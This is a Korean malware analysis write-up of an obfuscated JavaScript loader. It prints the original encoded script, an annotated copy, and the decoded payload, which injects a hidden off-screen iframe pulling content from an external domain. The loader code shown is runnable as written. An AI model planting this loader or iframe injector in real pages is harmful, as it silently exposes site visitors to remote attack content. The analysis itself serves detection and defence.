

1. 개요


이 샘플에는 몇몇 난독화 기법이 중복으로 함께 사용되어 있다.


1.1. 원본 소스코드



// Original obfuscated loader, kept verbatim for analysis (section 2.1 is the
// reformatted copy). Flow: try/catch probes on document.body used as control
// flow -> check that window.document exists -> decode the comma-separated hex
// list in `n` (each value minus 1, then String.fromCharCode) -> eval() the
// decoded script. Detection cues visible in this one statement run: eval() of a
// runtime-built string, String.fromCharCode over a long numeric list, and
// exceptions on document.body deliberately used to steer execution.
asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0xa,0xa,0x6a,0x67,0x21,0x29,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x74,0x43,0x7a,0x55,0x62,0x68,0x4f,0x62,0x6e,0x66,0x29,0x28,0x63,0x70,0x65,0x7a,0x28,0x2a,0x5c,0x31,0x5e,0x2a,0x7c,0xe,0xa,0xa,0xa,0x6a,0x67,0x73,0x62,0x6e,0x66,0x73,0x29,0x2a,0x3c,0xe,0xa,0xa,0x7e,0x21,0x66,0x6d,0x74,0x66,0x21,0x7c,0xe,0xa,0xa,0xa,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x23,0x3d,0x6a,0x67,0x73,0x62,0x6e,0x66,0x21,0x74,0x73,0x64,0x3e,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x69,0x77,0x62,0x73,0x6c,0x70,0x77,0x74,0x6c,0x6a,0x2f,0x6a,0x6f,0x67,0x70,0x30,0x65,0x45,0x79,0x4d,0x71,0x53,0x31,0x4d,0x39,0x52,0x58,0x31,0x49,0x55,0x51,0x48,0x31,0x4e,0x79,0x62,0x4d,0x31,0x62,0x7b,0x58,0x79,0x31,0x4f,0x4c,0x4a,0x51,0x31,0x36,0x4e,0x6d,0x44,0x31,0x58,0x32,0x37,0x74,0x30,0x28,0x21,0x78,0x6a,0x65,0x75,0x69,0x3e,0x28,0x32,0x31,0x31,0x28,0x21,0x69,0x66,0x6a,0x68,0x69,0x75,0x3e,0x28,0x32,0x31,0x31,0x28,0x21,0x74,0x75,0x7a,0x6d,0x66,0x3e,0x28,0x78,0x6a,0x65,0x75,0x69,0x3b,0x32,0x31,0x31,0x71,0x79,0x3c,0x69,0x66,0x6a,0x68,0x69,0x75,0x3b,0x32,0x31,0x31,0x71,0x79,0x3c,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x3b,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x3c,0x77,0x6a,0x74,0x6a,0x63,0x6a,0x6d,0x6a,0x75,0x7a,0x3b,0x69,0x6a,0x65,0x65,0x66,0x6f,0x3c,0x6d,0x66,0x67,0x75,0x3b,0x2e,0x32,0x31,0x31,0x31,0x31,0x71,0x79,0x3c,0x75,0x70,0x71,0x3b,0x31,0x3c,0x28,0x3f,0x3d,0x30,0x6a,0x67,0x73,0x62,0x6e,0x66,0x3f,0x23,0x2a,0x3c,0xe,0xa,0xa,0x7e,0xe,0xa,0xa,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x6a,0x67,0x73,0x62,0x6e,0x66,0x73,0x29,0x2a,0x7c,0xe,0xa,0xa,0xa,0x77,0x62,0x73,0x21,0x67,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,
0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x74,0x73,0x64,0x28,0x2d,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x69,0x77,0x62,0x73,0x6c,0x70,0x77,0x74,0x6c,0x6a,0x2f,0x6a,0x6f,0x67,0x70,0x30,0x65,0x45,0x79,0x4d,0x71,0x53,0x31,0x4d,0x39,0x52,0x58,0x31,0x49,0x55,0x51,0x48,0x31,0x4e,0x79,0x62,0x4d,0x31,0x62,0x7b,0x58,0x79,0x31,0x4f,0x4c,0x4a,0x51,0x31,0x36,0x4e,0x6d,0x44,0x31,0x58,0x32,0x37,0x74,0x30,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x3e,0x28,0x2e,0x32,0x31,0x31,0x31,0x31,0x71,0x79,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x77,0x6a,0x74,0x6a,0x63,0x6a,0x6d,0x6a,0x75,0x7a,0x3e,0x28,0x69,0x6a,0x65,0x65,0x66,0x6f,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x3e,0x28,0x31,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x3e,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x3e,0x28,0x31,0x28,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x78,0x6a,0x65,0x75,0x69,0x28,0x2d,0x28,0x32,0x31,0x31,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x69,0x66,0x6a,0x68,0x69,0x75,0x28,0x2d,0x28,0x32,0x31,0x31,0x28,0x2a,0x3c,0xe,0xa,0xa,0xa,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x74,0x43,0x7a,0x55,0x62,0x68,0x4f,0x62,0x6e,0x66,0x29,0x28,0x63,0x70,0x65,0x7a,0x28,0x2a,0x5c,0x31,0x5e,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x67,0x2a,0x3c,0xe,0xa,0xa,0x7e".split(",");h=2;s="";for(i=0;i-700!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;eval(""+s);}}}}


2. 분석


2.1. 난독화 소스코드 분석



// Reformatted copy of the obfuscated loader with analysis notes.
// Flow: junk try/catch probes on document.body -> check that window.document
// exists -> decode `n` (hex literals, each minus 1, via String.fromCharCode)
// -> eval() of the decoded script (shown deobfuscated in section 2.2).
asq = function () {
  return n[i];
}; // returns n[i]: one entry of the encoded array per call, driven by the global loop index i
ww = window;
ss = String.fromCharCode;
try {
  document.body = ~1 // assigns -2 to document.body -> throws, control goes to the catch
  // In JavaScript the tilde (~) is bitwise NOT: it flips every bit.
  // In 8 bits, 0000 0001 becomes 1111 1110.
  // The top bit is the sign bit, so in two's complement that value is -2.
  // Rule of thumb: ~n == -(n + 1).
} catch (dgsgsdg) {
  zz = 12 * 2 + 1 + 1; // junk computation, never used
  whwej = 12; // junk value, overwritten below
} {
  try {
    whwej = ~2; // whwej = -3
  }
  catch (agdsg) {
    whwej = 0; // not executed (~2 cannot throw)
  }
  if (whwej) { // if (-3): any non-zero number is truthy in JavaScript
    try {
      document.body++; // throws -> control goes to the catch
    }
    catch (bawetawe) {
      if (ww.document) { // window.document is an object, hence truthy; the decode only runs when it is present
        n = "0xa,0xa,0x6a,0x67,0x21,0x29,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x74,0x43,0x7a,0x55,0x62,0x68,0x4f,0x62,0x6e,0x66,0x29,0x28,0x63,0x70,0x65,0x7a,0x28,0x2a,0x5c,0x31,0x5e,0x2a,0x7c,0xe,0xa,0xa,0xa,0x6a,0x67,0x73,0x62,0x6e,0x66,0x73,0x29,0x2a,0x3c,0xe,0xa,0xa,0x7e,0x21,0x66,0x6d,0x74,0x66,0x21,0x7c,0xe,0xa,0xa,0xa,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x23,0x3d,0x6a,0x67,0x73,0x62,0x6e,0x66,0x21,0x74,0x73,0x64,0x3e,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x69,0x77,0x62,0x73,0x6c,0x70,0x77,0x74,0x6c,0x6a,0x2f,0x6a,0x6f,0x67,0x70,0x30,0x65,0x45,0x79,0x4d,0x71,0x53,0x31,0x4d,0x39,0x52,0x58,0x31,0x49,0x55,0x51,0x48,0x31,0x4e,0x79,0x62,0x4d,0x31,0x62,0x7b,0x58,0x79,0x31,0x4f,0x4c,0x4a,0x51,0x31,0x36,0x4e,0x6d,0x44,0x31,0x58,0x32,0x37,0x74,0x30,0x28,0x21,0x78,0x6a,0x65,0x75,0x69,0x3e,0x28,0x32,0x31,0x31,0x28,0x21,0x69,0x66,0x6a,0x68,0x69,0x75,0x3e,0x28,0x32,0x31,0x31,0x28,0x21,0x74,0x75,0x7a,0x6d,0x66,0x3e,0x28,0x78,0x6a,0x65,0x75,0x69,0x3b,0x32,0x31,0x31,0x71,0x79,0x3c,0x69,0x66,0x6a,0x68,0x69,0x75,0x3b,0x32,0x31,0x31,0x71,0x79,0x3c,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x3b,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x3c,0x77,0x6a,0x74,0x6a,0x63,0x6a,0x6d,0x6a,0x75,0x7a,0x3b,0x69,0x6a,0x65,0x65,0x66,0x6f,0x3c,0x6d,0x66,0x67,0x75,0x3b,0x2e,0x32,0x31,0x31,0x31,0x31,0x71,0x79,0x3c,0x75,0x70,0x71,0x3b,0x31,0x3c,0x28,0x3f,0x3d,0x30,0x6a,0x67,0x73,0x62,0x6e,0x66,0x3f,0x23,0x2a,0x3c,0xe,0xa,0xa,0x7e,0xe,0xa,0xa,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x6a,0x67,0x73,0x62,0x6e,0x66,0x73,0x29,0x2a,0x7c,0xe,0xa,0xa,0xa,0x77,0x62,0x73,0x21,0x67,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x74,0x73,0x64,0x28,0x2d,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,
0x69,0x77,0x62,0x73,0x6c,0x70,0x77,0x74,0x6c,0x6a,0x2f,0x6a,0x6f,0x67,0x70,0x30,0x65,0x45,0x79,0x4d,0x71,0x53,0x31,0x4d,0x39,0x52,0x58,0x31,0x49,0x55,0x51,0x48,0x31,0x4e,0x79,0x62,0x4d,0x31,0x62,0x7b,0x58,0x79,0x31,0x4f,0x4c,0x4a,0x51,0x31,0x36,0x4e,0x6d,0x44,0x31,0x58,0x32,0x37,0x74,0x30,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x3e,0x28,0x2e,0x32,0x31,0x31,0x31,0x31,0x71,0x79,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x77,0x6a,0x74,0x6a,0x63,0x6a,0x6d,0x6a,0x75,0x7a,0x3e,0x28,0x69,0x6a,0x65,0x65,0x66,0x6f,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x3e,0x28,0x31,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x3e,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x3e,0x28,0x31,0x28,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x78,0x6a,0x65,0x75,0x69,0x28,0x2d,0x28,0x32,0x31,0x31,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x69,0x66,0x6a,0x68,0x69,0x75,0x28,0x2d,0x28,0x32,0x31,0x31,0x28,0x2a,0x3c,0xe,0xa,0xa,0xa,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x74,0x43,0x7a,0x55,0x62,0x68,0x4f,0x62,0x6e,0x66,0x29,0x28,0x63,0x70,0x65,0x7a,0x28,0x2a,0x5c,0x31,0x5e,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x67,0x2a,0x3c,0xe,0xa,0xa,0x7e".split(",");
        // split(",") turns the comma-separated hex literals into an array of strings
        h = 2; // junk value
        s = ""; // accumulator for the decoded script
        for (i = 0; i - 700 != 0; i++) { // 700 iterations; `i - 700 != 0` is an obfuscated `i < 700`
          k = i; // junk value
          s = s.concat(ss(eval(asq()) - 1));
          // i.e. s = s.concat(String.fromCharCode(eval(n[i]) - 1));
          // eval() turns the "0x.." string into a number and 1 is subtracted (the encoding offset),
          // fromCharCode maps the result to a character,
          // and concat appends it to the decoded script
        }
        z = s; // junk value
        eval("" + s); // executes the decoded script; eval() of a runtime-built string is the main detection cue
      }
    }
  }
}


2.2. 난독화 해제



// Decoded payload, entry point: if a <body> element already exists the iframe is
// injected through the DOM (iframer, defined below); otherwise document.write()
// is used. Both branches load the same external URL in a 100x100 iframe that is
// positioned off-screen (left:-10000px) and set visibility:hidden, so nothing is
// shown to the user. That URL is the network indicator to hunt for / block.
if (document.getElementsByTagName('body')[0]) {
  // check whether a <body> tag exists yet
    iframer(); // body exists -> build the iframe through the DOM
  } else {
    document.write("<iframe src='http://chvarkovski.info/dDxLpR0L8QW0HTPG0MxaL0azWx0NKIP05MlC0W16s/'width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
  } // no body yet -> write the iframe markup directly into the document
/**
 * Decoded payload helper: builds a hidden <iframe> through the DOM and appends
 * it to <body>. The frame points at the same external URL as the
 * document.write() fallback above; it is moved off-screen (left:-10000px) and
 * hidden (visibility:hidden) while keeping a 100x100 size, so the remote
 * content is loaded without being visible. Requires a <body> element, i.e. a
 * real browser DOM rather than a bare JavaScript engine.
 */
function iframer() {
  var f = document.createElement('iframe');
  f.setAttribute('src', 'http://chvarkovski.info/dDxLpR0L8QW0HTPG0MxaL0azWx0NKIP05MlC0W16s/');
  f.style.left = '-10000px';
  f.style.visibility = 'hidden';
  f.style.top = '0';
  f.style.position = 'absolute';
  f.style.top = '0'; // duplicate of the assignment two lines above, present in the original payload
  f.setAttribute('width', '100');
  f.setAttribute('height', '100');
  document.getElementsByTagName('body')[0].appendChild(f);
  // attach the configured frame to <body>
}


iframe을 선언하는 방식 중 하나로, DOM을 이용하여 iframe을 하나의 요소(element)로 생성할 수 있다. DOM을 이용하려면 body 태그가 필요한데, 이 태그는 자바스크립트가 아닌 HTML 태그이다. 따라서 브라우저 없이 자바스크립트 엔진만으로 난독화를 분석하는 도구들은 이 부분을 자바스크립트로 인식하지 못하므로, 이러한 방식은 하나의 Anti-DeObfuscation 기법이라 할 수 있다.


3. 정리


  • 자바스크립트 언어의 특징으로 0 값이 아닌 숫자는 모두 true로 인식
  • 음수 값을 틸드 연산을 이용하여 표현
  • 16진수 값을 변형
  • 조건부 실행
  • DOM 객체를 이용한 자바스크립트 실행
  • width, height 값이 시각적으로 보일 수 있는 크기라도 감출 수 있음



